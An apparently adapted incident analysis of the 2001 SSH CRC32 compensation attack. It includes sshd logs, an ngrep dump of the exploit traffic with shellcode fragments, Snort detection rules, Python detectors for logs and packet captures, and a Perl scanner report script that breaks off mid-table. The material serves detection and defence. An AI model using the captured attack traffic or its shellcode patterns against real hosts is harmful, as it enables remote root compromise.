Nov  1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov  1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov  1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov  1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov  1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov  1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov  1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov  1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov  1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov  1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov  1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov  1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov  1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov  1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
Nov  1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov  1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
Nov  1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov  1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov  1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Note the last log entry. When the exploit succeeds, the authentication process stops, because at that point the shellcode's backdoor has already executed and the attacker can connect to its port and run any operation. The only catch (for the attacker) is that the SSH daemon (at least ssh.com 1.2.31) times out when authentication does not complete, which closes the open shell. Typically there is a 10-minute window before the parent process of the listening shell is killed.
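To turn the pattern in that log into a check, here is an added detector (my example, not code from this article) that reads sshd lines in the format of the excerpt above: it flags a source that opens many connections in a short window, counts the detector's fatal messages, and treats a burst followed by "Timeout before authentication" as a likely successful exploit. The log lines it runs on are constructed to mirror the excerpt, not copied from it.

```python
"""Detection over ssh.com 1.2.x sshd syslog lines, modelled on the excerpt
above.  Added example, not from the original article; the sample lines in
sample_log() are constructed to mirror the excerpt's format."""
import re
from collections import defaultdict
from datetime import datetime

# "Nov  1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[(?P<pid>\d+)\]: "
    r"(?P<level>log|fatal): (?P<msg>.*)$")
CONN_RE = re.compile(r"Connection from (?P<src>[\d.]+) port (?P<port>\d+)")

# fatal messages the detector emits when a probe does not land cleanly
ATTACK_MSGS = ("crc32 compensation attack", "Corrupted check bytes")
# a child that never finished authentication: the sign of a shell left open
TIMEOUT_MSG = "Timeout before authentication"


def parse(lines, year=2001):
    """Yield (timestamp, pid, level, message); syslog lines carry no year."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, int(m["pid"]), m["level"], m["msg"]))
    return events


def analyse(lines, burst=10, window_s=60):
    """Per-source findings: connection count, detector hits, whether the
    source produced a burst of >= `burst` connections within `window_s`
    seconds, and whether such a burst was followed by an auth timeout."""
    src_of_pid = {}                 # sshd child pid -> peer address
    conns = defaultdict(list)       # peer -> connection timestamps
    hits = defaultdict(int)         # peer -> detector fatals
    timeouts = defaultdict(int)     # peer -> "Timeout before authentication"
    for ts, pid, level, msg in parse(lines):
        c = CONN_RE.search(msg)
        if c:
            src_of_pid[pid] = c["src"]
            conns[c["src"]].append(ts)
            continue
        src = src_of_pid.get(pid)   # fatals name only the child pid
        if src is None:
            continue
        if any(k in msg for k in ATTACK_MSGS):
            hits[src] += 1
        elif TIMEOUT_MSG in msg:
            timeouts[src] += 1
    findings = {}
    for src, times in conns.items():
        times.sort()
        bursty = any(
            (times[i + burst - 1] - times[i]).total_seconds() <= window_s
            for i in range(len(times) - burst + 1))
        findings[src] = {
            "connections": len(times),
            "detector_hits": hits[src],
            "burst": bursty,
            "likely_exploited": bursty and timeouts[src] > 0,
        }
    return findings


def sample_log():
    """Constructed sample: one benign connection, then a 20-connection
    brute-force burst with detector fatals, and a timeout 10 minutes later."""
    lines = ["Nov  1 18:40:00 victim sshd[9000]: log: Connection from 10.10.10.2 port 33354"]
    pid = 9510
    for i in range(20):
        sec = 14 + 2 * i
        lines.append(f"Nov  1 18:46:{sec:02d} victim sshd[{pid}]: log: "
                     f"Connection from 10.10.10.10 port {33298 + i}")
        if i % 7 == 3:
            lines.append(f"Nov  1 18:46:{sec:02d} victim sshd[{pid}]: fatal: Local: "
                         "crc32 compensation attack: network attack detected")
        if i % 7 == 5:
            lines.append(f"Nov  1 18:46:{sec:02d} victim sshd[{pid}]: fatal: Local: "
                         "Corrupted check bytes on input.")
        pid += 1
    # the last child never completes authentication: the shell was left open
    lines.append(f"Nov  1 18:57:52 victim sshd[{pid - 1}]: fatal: Timeout before authentication.")
    return lines


if __name__ == "__main__":
    for src, f in analyse(sample_log()).items():
        print(src, f)
```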

Network traffic analysis

=====================

Here tcpdump was used to capture the attack above, recording it in sshdx.dump; an IDS can use the capture to derive attack signatures. If your IDS does not support tcpdump files, you can use "tcpreplay" [12] to replay the tcpdump capture to it.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This makes it easy to view the multiple connections made to the SSH daemon; with the "ngrep" [5] tool one can identify the brute-force attempts and the final connection that inserts the shellcode:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

.

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

SSH-1.5-1.2.31.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

SSH-1.5-OpenSSH_2.2.0p1.

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

.......... Ga .. @ .......% .... `..p ..... D & .. 2. 7 # ... 1! ? .. cr) .8. ^. h .....

..I..b..9.f ........ n..0 ....: bah @ se..h ... (. D2.zg ..... . # ....... /. J

W ... o $ ... 6 ....... $ ... v ..; ... u. @ y.k2.p

. @ 7.wbby ... 1.i ..% "..... g * ggt (... m ........ [....... J ... <.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

.......... Ga .. @ ..... `g.fg.g.!. I.} ..........._. E ... . = .. / .. 6 ....; ....)

T ..... | c ... # w./wve.cy .n ..... q.sc ....} .. "ngw" .... n ... / #. ....8x .. &. Z

.... q / ....... 8 ..

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

......... 4 ..

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

. W ... 2 ....... 2 ....... 2 ....... 2 ... .... 2 ....... 2 ....... 2 ....... 2 .......

2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2. ...... 2 ....... 2 ....

..2! ... 2 $ ... 2% ... 2 (... 2) ... 2, ...... 2 -...... 20 ... 21 ..

.... 24 ... 25 ... 28 ... 29 ... 2 <... 2 = ... 2 @ ... 2a ... 2D

... 2E ... 2H ... 2i ... 2L ... 2M ... 2P ... 2Q. ..... 2T ......

2U ... 2x ... 2y ... 2 / ... 2] ... 2` 2a .... ..2d ... 2e ....

..2h ... 2i ... 2L ... 2M ... 2P ... 2Q ... 2T ..... .2U ... 2X ..

.... 2y ... 2 | ... 2} ... 2 ....... 2 ....... 2 ... .2 ....... 2 ....... 2.

... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ... .... 2 ....... 2 .......

2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2. ...... 2 ....... 2 .....

..2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ...

.... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ..... ..2 ....... 2 ....... 2.

... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ... .... 2 ....... 2 .......

2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2. ...... 2 ....... 2 .....

..2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 3 ....... 3 ....... 3 ...

.... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ..... ..3 ....... 3 ....... 3.

... 3 ....... 3 ....... 3 ....... 3 ....... 3 ... 3! ... ... 3 $ ... 3% ...

3 (... 3) ... 3, ... 3 -...... 30 ... 31 ... 34 ... ... 35 ... 38 ....

..39 ... 3 <... 3 = ... 3 @ ... 3a ... 3d ... 3e .. .... 3h ... 3i ..

.... 3l ... 3m ... 3p ... 3Q ... 3t ... 3u ... 3x ... ... 3y ... 3 /

... 3] ... 3` ... 3a ... 3D ........ 1 ... p}. @

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

... 3i ... 3l ... 3M ... 3P ... 3Q ... 3t ... 3u. ..... 3x ...

3y ... 3 | ... 3} ... 3 ....... 3 ....... 3 ....... 3 .. ..... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 .... ... 3 ....... 3 ....... 3 ....... 3 ....... 3 ...

.... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ..... ..3 ....... 3 ....... 3.

...... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ... .... 3 ....... 3 .......

3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3. ...... 3 ....... 3 .....

..3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ...

.... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ..... ..3 ....... 3 ....... 3.

... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 4 ... .... 4 ....... 4 .......

4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4. ... 4 ....... 4 .....

..4 ....... 4 ....... 4 ....... 4 ....... 4 ... 4! ...... 4 $ ... 4% ... 4 (..

.... 4) ... 4, ... 4 -...... 40 ... 41 ... 44 ... 45 ... 48 ... 49

... 4 <... 4 = ... 4 @ ... 4a ... 4d ... 4e ..... .4h ... 4i ......

4L ... 4M ... 4P ... 4Q ... 4t ... 4u ... 4x ... 4y ... 4 / ....

..4] ... 4` ... 4a ... 4d ... 4e ... 4h ... 4i ... ... 4L ... 4m ..

.... 4p ... 4q ... 4t ... 4u ... 4x ... 4y ... 4 | .. .... 4} ... 4.

... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ... .... 4 ....... 4 .......

4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4. ... 4 ....... 4 .....

..4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ...

.... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ..... ..4 ....... 4 ....... 4.

...... 4 ....... 4 ....... 4 ....... 4 ......... 1 ... p}. @

.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ................................................ ......................................

................................................ ....................

................................................ ....................

................................................ ....................

..................... 1..f..1 ... c.]. C.] Km.m ... 1. Cf.] Fe09.m.

.E..e ..... m ..... cc .... c ... 1. 1.? ... a ... ^. U.1..f. .E ... m..u .......

./bin/sh.h0H0H0, 7350, ZIP / TESO! .................................. .

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

..................................................................

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

An attack of this kind can be matched on the string "H0H0H0, 7350, ZIP / TESO!" [7] (visible in the final packet above), on the NOP sled, and on other fixed bytes of the shellcode. The following signatures were written by Marty Roesch and Brian Caswell and can be used with Snort 1.8 or later [6]. Two caveats: the rules are keyed to port 22, while the test daemon above listened on 2222, so adjust the port to match your deployment; and they only work because the overflowing packet is sent in the clear, as the ngrep output shows. Content matching cannot see into an encrypted session.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

# flags:A+ matches any segment with ACK set, which includes the PSH/ACK
# data segments seen in the ngrep output above.

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
    flags:A+; content:"/bin/sh"; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow filler"; \
    flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00|"; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
    flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90|"; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)

# The 7-byte header content fills the depth:7 window exactly; it is the
# fixed SSH1 packet length 0x00015700 the exploit sends plus the bytes
# that follow it.
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow"; \
    flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \
    content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
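The following Python program is an added illustration, not part of Dittrich's analysis or of the Snort distribution. It reads a tcpdump-format capture and applies the four signatures above to every TCP payload, which is the check you would run against sshdx.dump before relying on the rules. So that it runs offline it builds a small capture in memory instead of opening sshdx.dump: the addresses and banners mirror the ngrep output, the SSH_CMSG_USER packet is an ordinary protocol 1 packet, and the "overflow" packet is a synthetic stand-in that carries only the bytes the rules look for, not the real exploit. The parser handles Ethernet/IPv4/TCP only, and the matcher treats `depth` as counted from `offset` (for these rules the patterns sit exactly at the offset, so either reading of depth fires).

```python
"""Offline scanner that replays a capture through the four Snort-style
SSH CRC32 signatures.  Added example (not from the original analysis):
the pcap is constructed in memory so it runs without tcpdump, and the
"exploit" packet is a synthetic stand-in built only to trip the rules."""
import struct

# (message, [(content, offset, depth), ...]); all contents must match.
# Assumption about the matcher: the search window starts at `offset`
# and spans `depth` bytes (None = to the end of the payload).
RULES = [
    ("EXPLOIT ssh CRC32 overflow /bin/sh", [(b"/bin/sh", 0, None)]),
    ("EXPLOIT ssh CRC32 overflow filler", [(b"\x00" * 11, 0, None)]),
    ("EXPLOIT ssh CRC32 overflow NOOP", [(b"\x90" * 11, 0, None)]),
    ("EXPLOIT ssh CRC32 overflow",
     [(bytes.fromhex("00015700000018"), 0, 7),   # SSH1 length 0x15700 ...
      (bytes.fromhex("ffffffff0000"), 8, 14)]),
]
TCP_FLAG_LETTERS = ((0x10, "A"), (0x08, "P"), (0x02, "S"), (0x01, "F"), (0x04, "R"))


def content_match(payload, content, offset, depth):
    window = payload[offset:] if depth is None else payload[offset:offset + depth]
    return content in window


def match_rules(payload):
    """Return the messages of every rule whose contents all match."""
    return [msg for msg, contents in RULES
            if all(content_match(payload, c, o, d) for c, o, d in contents)]


def ip_bytes(addr):
    return bytes(int(x) for x in addr.split("."))


def build_frame(src, sport, dst, dport, flags, payload):
    """Ethernet/IPv4/TCP frame with zeroed checksums (enough for offline parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ip_bytes(src), ip_bytes(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_pcap(frames):
    """Little-endian pcap (magic a1b2c3d4, linktype 1 = Ethernet)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1_000_000_000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def tcp_segments(pcap):
    """Yield (src, sport, dst, dport, flags, payload) for each IPv4/TCP frame."""
    if struct.unpack_from("<I", pcap, 0)[0] != 0xA1B2C3D4:
        raise ValueError("expected little-endian microsecond pcap")
    pos = 24
    while pos + 16 <= len(pcap):
        incl_len = struct.unpack_from("<IIII", pcap, pos)[2]
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if struct.unpack_from("!H", frame, 12)[0] != 0x0800:
            continue                                    # not IPv4
        ip = frame[14:]
        ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0]
        if ip[9] != 6:
            continue                                    # not TCP
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        yield (".".join(map(str, ip[12:16])), sport, ".".join(map(str, ip[16:20])), dport,
               tcp[13], tcp[data_off:])


def scan_pcap(pcap):
    """Return one record per TCP segment that trips at least one rule."""
    hits = []
    for index, (src, sport, dst, dport, flags, payload) in enumerate(tcp_segments(pcap)):
        alerts = match_rules(payload)
        if alerts:
            hits.append({"index": index,
                         "flow": f"{src}:{sport} -> {dst}:{dport}",
                         "flags": "".join(l for bit, l in TCP_FLAG_LETTERS if flags & bit),
                         "alerts": alerts})
    return hits


# Constructed traffic mirroring the ngrep output: banners, one ordinary
# SSH1 SSH_CMSG_USER packet, then a synthetic overflow packet (not the real exploit).
PSH_ACK = 0x18
BENIGN_USER_PKT = bytes.fromhex("0000000d 112233 04 00000004") + b"root" + bytes.fromhex("deadbeef")
EXPLOIT_PAYLOAD = (bytes.fromhex("00015700000018") + b"\x00" + bytes.fromhex("ffffffff0000")
                   + b"\x90" * 32 + b"/bin/sh\x00" + b"\x00" * 16)
SAMPLE_PCAP = build_pcap([
    build_frame("10.10.10.3", 2222, "10.10.10.10", 32957, PSH_ACK, b"SSH-1.5-1.2.31\n"),
    build_frame("10.10.10.10", 32957, "10.10.10.3", 2222, PSH_ACK, b"SSH-1.5-OpenSSH_2.2.0p1\n"),
    build_frame("10.10.10.10", 32957, "10.10.10.3", 2222, PSH_ACK, BENIGN_USER_PKT),
    build_frame("10.10.10.10", 32957, "10.10.10.3", 2222, PSH_ACK, EXPLOIT_PAYLOAD),
])

if __name__ == "__main__":
    for hit in scan_pcap(SAMPLE_PCAP):
        print(f"#{hit['index']} {hit['flow']} [{hit['flags']}]: " + ", ".join(hit["alerts"]))
```

Only the last segment should report, and it should report all four rules; the banners and the ordinary SSH_CMSG_USER packet must stay silent, which is the false-positive check worth repeating on a day of real port 22 traffic before deploying the filler and NOOP rules, since eleven zero bytes can occur in legitimate binary protocols.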

Checking whether your hosts are vulnerable

==========================================

Jeremy Mates' ssh_scan.pl [8] and Niels Provos' scanssh [9] can be used to find the SSH servers on your network and record their version banners. Russell Fulton also posted a script that works from Argus [10] logs; the scripts are included in the appendix.
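The ssh-report script in Appendix A decides "affected" by looking each banner up in a hand-maintained table. The following Python program is an added example, not the page's script or any of the scanners cited above: it classifies banners by version range instead, using the ranges implied by that table (ssh.com 1.2.24 through 1.2.31 affected, 1.2.31a and later fixed; OpenSSH before 2.3.0 affected; ssh.com 2.x and 3.0.x "affected with version 1 fallback"), so a newly seen patch level such as 1.2.27 or OpenSSH 2.2.0p1 does not need its own table row. Anything it cannot parse, including scanner error strings such as "Couldn't connect", is reported as unknown. All scan lines below are constructed input in the format ssh-report expects.

```python
"""Classify SSH server banners for the CRC32 compensation attack detector
bug by version range rather than by an exhaustive lookup table.  Added
example (not the page's ssh-report script): the ranges are taken from the
affected/not-affected list in Appendix A, and all banners below are
constructed test input."""
import re
from collections import defaultdict

BANNER_RE = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)", re.IGNORECASE)
VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(.*)$")

AFFECTED = "affected"
NOT_AFFECTED = "not affected"
FALLBACK = "affected w/ version 1 fallback"
UNKNOWN = "unknown"


def split_version(text):
    """'1.2.31a' -> ((1, 2, 31), 'a'); '2.5.2p2' -> ((2, 5, 2), 'p2')."""
    m = VERSION_RE.match(text)
    if not m:
        return (), text
    return tuple(int(x) for x in m.group(1).split(".")), m.group(2)


def classify(banner):
    """Map one server banner (or a scanner error string) to a status."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return UNKNOWN                      # "Couldn't connect", "Timeout", ...
    software = m.group("software")
    openssh = re.match(r"^OpenSSH[_-](.+)$", software, re.IGNORECASE)
    if openssh:
        nums, _ = split_version(openssh.group(1))
        # OpenSSH 1.2 through 2.2.0p1 are listed as affected; 2.3.0 fixed it.
        return AFFECTED if nums and nums < (2, 3, 0) else NOT_AFFECTED
    nums, suffix = split_version(software)
    if not nums:
        return UNKNOWN                      # Cisco, OSU, RemotelyAnywhere, ...
    if nums[0] == 1:
        # ssh.com 1.2.24 .. 1.2.31 are affected; 1.2.31a, 1.2.32 and 1.3.7
        # are fixed; 1.2.14 .. 1.2.23 are listed as not affected; anything
        # older is not in the table and is reported as unknown.
        if nums < (1, 2, 14):
            return UNKNOWN
        if (1, 2, 24) <= nums <= (1, 2, 31) and not suffix:
            return AFFECTED
        return NOT_AFFECTED
    if nums[0] in (2, 3):
        # ssh.com 2.x/3.0.x servers are listed as affected only through
        # their fallback to a version 1 daemon; check that setting on the host.
        return FALLBACK
    return UNKNOWN


def summarize(scan_lines, report_all=False):
    """Group "ip host banner" scan lines by (banner, status), as ssh-report does."""
    groups = defaultdict(list)
    for line in scan_lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        ip, host, banner = parts
        status = classify(banner)
        if status == NOT_AFFECTED and not report_all:
            continue
        groups[(banner.strip(), status)].append((host, ip))
    return dict(groups)


# Constructed scan output in the format ssh-report expects.
SAMPLE_SCAN = [
    "10.0.0.1  beavertail.dept.foo.edu  SSH-1.5-1.2.31",
    "10.0.0.2  lumpysoup.dept.foo.edu   SSH-1.5-1.2.31a",
    "10.0.0.3  marktwain.dept.foo.edu   SSH-1.99-OpenSSH_2.5.2p2",
    "10.0.0.11 hobbes.dept.foo.edu      SSH-1.99-OpenSSH_2.2.0p1",
    "10.0.0.12 router.dept.foo.edu      SSH-1.5-Cisco-1.25",
    "10.0.0.13 sshd2.dept.foo.edu       SSH-1.99-3.0.1",
    "10.0.0.14 quiet.dept.foo.edu       Couldn't connect",
]

if __name__ == "__main__":
    for (banner, status), hosts in sorted(summarize(SAMPLE_SCAN).items()):
        print(f"\n{banner} ({status})")
        for host, ip in hosts:
            print(f"   {host} ({ip})")
```

Note that a banner only tells you what the daemon claims; an "SSH-1.99" ssh.com 2.x or 3.0.x server is dangerous only if its version 1 fallback actually hands protocol 1 clients to a vulnerable ssh1 binary, which has to be confirmed on the host itself.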

-------------------------------------------------- ----------------------------

References

==========

[1] Portable Linux Auditing CD (PLAC) v2.9.1pre2, by Fred Cohen
    http://www.all.net/forensix/plac.html

[2] Netcat, by Hobbit
    http://www.l0pht.com/~weld/netcat/

[3] Reverse Engineer's Query Tool (REQT)
    http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz

[4] List open files (lsof)
    http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz

[5] ngrep, by Jordan Ritter
    http://www.packetfactory.net/projects/ngrep/

[6] Snort
    http://www.snort.org/

[7] 7350.org / TESO
    http://www.7350.org/
    http://www.team-teso.org/about.php (see the bottom of the page)

[8] ssh_scan.pl, by Jeremy Mates
    http://sial.org/code/perl/scripts/ssh_scan.pl.html

[9] scanssh, by Niels Provos
    http://www.monkey.org/~provos/scanssh/

[10] Argus, network audit tool
    http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1

[11] tcpdump capture of the attack (sshdx.dump)
    http://staff.washington.edu/dittrich/misc/sshdx.dump

[12] tcpreplay
    http://packages.debian.org/testing/net/tcpreplay.html

Appendix A

==========

The scanning scripts follow.

= - = - = - = - = - = - = - = - = - = - = - cut here - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich
# Thu Nov  8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into a two-level break report format by SSH version.
#
# This script operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report scanresults
#
# SSH-1.5-1.2.31 (affected)
#    beavertail.dept.foo.edu (10.0.0.1)
#    lumpysoup.dept.foo.edu (10.0.0.2)
#    junebug.dept.foo.edu (10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
#    hobbes.dept.foo.edu (10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers.  Use the "-a"
# option to report on all servers.  Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the CRC32
# Compensation Attack Detector vulnerability:
#
#   http://www.kb.cert.org/vuls/id/945216
#   http://www.securityfocus.com/bid/2347/
#   http://xforce.iss.net/alerts/advise100.php
#   http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above.  You
# should update this list as new information is obtained, or if new
# versions of the SSH server are found on your network.

use strict;
use warnings;

my %affected = (
    'unknown'                   => 'unknown',
    'SSH-1.4-1.2.14'            => 'not affected',
    'SSH-1.4-1.2.15'            => 'not affected',
    'SSH-1.4-1.2.16'            => 'not affected',
    'SSH-1.5-1.2.17'            => 'not affected',
    'SSH-1.5-1.2.18'            => 'not affected',
    'SSH-1.5-1.2.19'            => 'not affected',
    'SSH-1.5-1.2.20'            => 'not affected',
    'SSH-1.5-1.2.21'            => 'not affected',
    'SSH-1.5-1.2.22'            => 'not affected',
    'SSH-1.5-1.2.23'            => 'not affected',
    'SSH-1.5-1.2.24'            => 'affected',
    'SSH-1.5-1.2.25'            => 'affected',
    'SSH-1.5-1.2.26'            => 'affected',
    'SSH-1.5-1.2.27'            => 'affected',
    'SSH-1.5-1.2.28'            => 'affected',
    'SSH-1.5-1.2.29'            => 'affected',
    'SSH-1.5-1.2.30'            => 'affected',
    'SSH-1.5-1.2.31'            => 'affected',
    'SSH-1.5-1.2.31a'           => 'not affected',
    'SSH-1.5-1.2.32'            => 'not affected',
    'SSH-1.5-1.3.7'             => 'not affected',
    'SSH-1.5-Cisco-1.25'        => 'unknown',
    'SSH-1.5-OSU_1.5alpha1'     => 'unknown',
    'SSH-1.5-OpenSSH-1.2'       => 'affected',
    'SSH-1.5-OpenSSH-1.2.1'     => 'affected',
    'SSH-1.5-OpenSSH-1.2.2'     => 'affected',
    'SSH-1.5-OpenSSH-1.2.3'     => 'affected',
    'SSH-1.5-OpenSSH_2.5.1'     => 'not affected',
    'SSH-1.5-OpenSSH_2.5.1p1'   => 'not affected',
    'SSH-1.5-OpenSSH_2.9p1'     => 'not affected',
    'SSH-1.5-OpenSSH_2.9p2'     => 'not affected',
    'SSH-1.5-RemotelyAnywhere'  => 'not affected',
    'SSH-1.99-2.0.11'           => 'affected w/ version 1 fallback',
    'SSH-1.99-2.0.12'           => 'affected w/ version 1 fallback',
    'SSH-1.99-2.0.13'           => 'affected w/ version 1 fallback',
    'SSH-1.99-2.1.0.pl2'        => 'affected w/ version 1 fallback',
    'SSH-1.99-2.1.0'            => 'affected w/ version 1 fallback',
    'SSH-1.99-2.2.0'            => 'affected w/ version 1 fallback',
    'SSH-1.99-2.3.0'            => 'affected w/ version 1 fallback',
